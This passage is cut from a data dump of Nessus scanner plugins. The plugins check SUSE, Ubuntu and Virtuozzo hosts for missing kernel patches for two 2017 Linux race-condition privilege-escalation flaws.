audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP2\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(2)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP2\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"2\", cpu:\"s390x\", reference:\"kernel-default-man-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-base-debuginfo-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debuginfo-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-debugsource-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-default-devel-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"2\", reference:\"kernel-syms-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-devel-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-4.4.74-92.35.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"2\", cpu:\"x86_64\", reference:\"kernel-syms-4.4.74-92.35.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-01T04:28:20", "bulletinFamily": "scanner", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to 3.12.74 to the\nfollowing security updates :\n\n - CVE-2017-1000111: fix race condition in net-packet code\n that could be exploited to cause out-of-bounds memory\n access (bsc#1052365).\n\n - CVE-2017-1000112: fix race condition in net-packet code\n that could have been exploited by unprivileged users to\n gain root access. (bsc#1052311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-07-02T00:00:00", "id": "SUSE_SU-2017-2150-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102478", "published": "2017-08-14T00:00:00", "title": "SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2150-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:2150-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102478);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/09/11 11:22:16\");\n\n script_cve_id(\"CVE-2017-1000111\", \"CVE-2017-1000112\");\n\n script_name(english:\"SUSE SLES12 Security Update : kernel (SUSE-SU-2017:2150-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SUSE Linux Enterprise 12 SP1 kernel was updated to 3.12.74 to the\nfollowing security updates :\n\n - CVE-2017-1000111: fix race condition in net-packet code\n that could be exploited to cause out-of-bounds memory\n access (bsc#1052365).\n\n - CVE-2017-1000112: fix race condition in net-packet code\n that could have been exploited by unprivileged users to\n gain root access. (bsc#1052311).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052311\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1052365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000111/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2017-1000112/\"\n );\n # https://www.suse.com/support/update/announcement/2017/suse-su-20172150-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?5c0f9e64\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE OpenStack Cloud 6:zypper in -t patch\nSUSE-OpenStack-Cloud-6-2017-1328=1\n\nSUSE Linux Enterprise Server for SAP 12-SP1:zypper in -t patch\nSUSE-SLE-SAP-12-SP1-2017-1328=1\n\nSUSE Linux Enterprise Server 12-SP1-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2017-1328=1\n\nSUSE Linux Enterprise Module for Public Cloud 12:zypper in -t patch\nSUSE-SLE-Module-Public-Cloud-12-2017-1328=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_54-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kgraft-patch-3_12_74-60_64_54-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/14\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_54-default-1-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"x86_64\", reference:\"kgraft-patch-3_12_74-60_64_54-xen-1-2.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-base-debuginfo-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debuginfo-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-debugsource-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-default-devel-3.12.74-60.64.54.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"kernel-syms-3.12.74-60.64.54.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-01T04:54:08", "bulletinFamily": "scanner", "description": "Andrey Konovalov discovered a race condition in the UDP Fragmentation\nOffload (UFO) code in the Linux kernel. A local attacker could use\nthis to cause a denial of service or execute arbitrary code.\n(CVE-2017-1000112)\n\nAndrey Konovalov discovered a race condition in AF_PACKET socket\noption handling code in the Linux kernel. A local unprivileged\nattacker could use this to cause a denial of service or possibly\nexecute arbitrary code. (CVE-2017-1000111).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-07-02T00:00:00", "id": "UBUNTU_USN-3384-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102418", "published": "2017-08-11T00:00:00", "title": "Ubuntu 17.04 : linux, linux-raspi2 vulnerabilities (USN-3384-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3384-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102418);\n script_version(\"3.12\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-1000111\", \"CVE-2017-1000112\");\n script_xref(name:\"USN\", value:\"3384-1\");\n\n script_name(english:\"Ubuntu 17.04 : linux, linux-raspi2 vulnerabilities (USN-3384-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Andrey Konovalov discovered a race condition in the UDP Fragmentation\nOffload (UFO) code in the Linux kernel. A local attacker could use\nthis to cause a denial of service or execute arbitrary code.\n(CVE-2017-1000112)\n\nAndrey Konovalov discovered a race condition in AF_PACKET socket\noption handling code in the Linux kernel. A local unprivileged\nattacker could use this to cause a denial of service or possibly\nexecute arbitrary code. (CVE-2017-1000111).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3384-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.10-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-raspi2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:17.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/11\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(17\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 17.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000111\", \"CVE-2017-1000112\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3384-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-1015-raspi2\", pkgver:\"4.10.0-1015.18\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-32-generic\", pkgver:\"4.10.0-32.36\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-32-generic-lpae\", pkgver:\"4.10.0-32.36\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-4.10.0-32-lowlatency\", pkgver:\"4.10.0-32.36\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-generic\", pkgver:\"4.10.0.32.32\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"4.10.0.32.32\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.10.0.32.32\")) flag++;\nif (ubuntu_check(osver:\"17.04\", pkgname:\"linux-image-raspi2\", pkgver:\"4.10.0.1015.16\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.10-generic / linux-image-4.10-generic-lpae / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-01T00:55:10", "bulletinFamily": "scanner", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets are\n implemented in the Linux kernel networking subsystem\n handling synchronization. A local user able to open a\n raw packet socket (requires the CAP_NET_RAW capability)\n could use this flaw to elevate their privileges on the\n system.\n\n - Andrey Konovalov discovered a race condition in the UDP\n Fragmentation Offload (UFO) code in the Linux kernel. A\n local attacker could use this to cause a denial of\n service or execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "modified": "2020-07-02T00:00:00", "id": "VIRTUOZZO_VZA-2017-072.NASL", "href": "https://www.tenable.com/plugins/nessus/102592", "published": "2017-08-21T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-072)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102592);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/06/10 11:30:32\");\n\n script_cve_id(\n \"CVE-2017-1000111\",\n \"CVE-2017-1000112\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-072)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A race condition issue leading to a use-after-free flaw\n was found in the way the raw packet sockets are\n implemented in the Linux kernel networking subsystem\n handling synchronization. A local user able to open a\n raw packet socket (requires the CAP_NET_RAW capability)\n could use this flaw to elevate their privileges on the\n system.\n\n - Andrey Konovalov discovered a race condition in the UDP\n Fragmentation Offload (UFO) code in the Linux kernel. A\n local attacker could use this to cause a denial of\n service or execute arbitrary code.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2860785\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.10-29.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f3a07813\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-30.15-29.0-1.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?13d1f21f\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel UDP Fragmentation Offset (UFO) Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/08/21\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.10\",\n \"patch\",\"readykernel-patch-30.10-29.0-1.vl7\"\n ),\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.16.1.vz7.30.15\",\n \"patch\",\"readykernel-patch-30.15-29.0-1.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-01T00:55:10", "bulletinFamily": "scanner", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - A race condition issue leading to a use-after-free 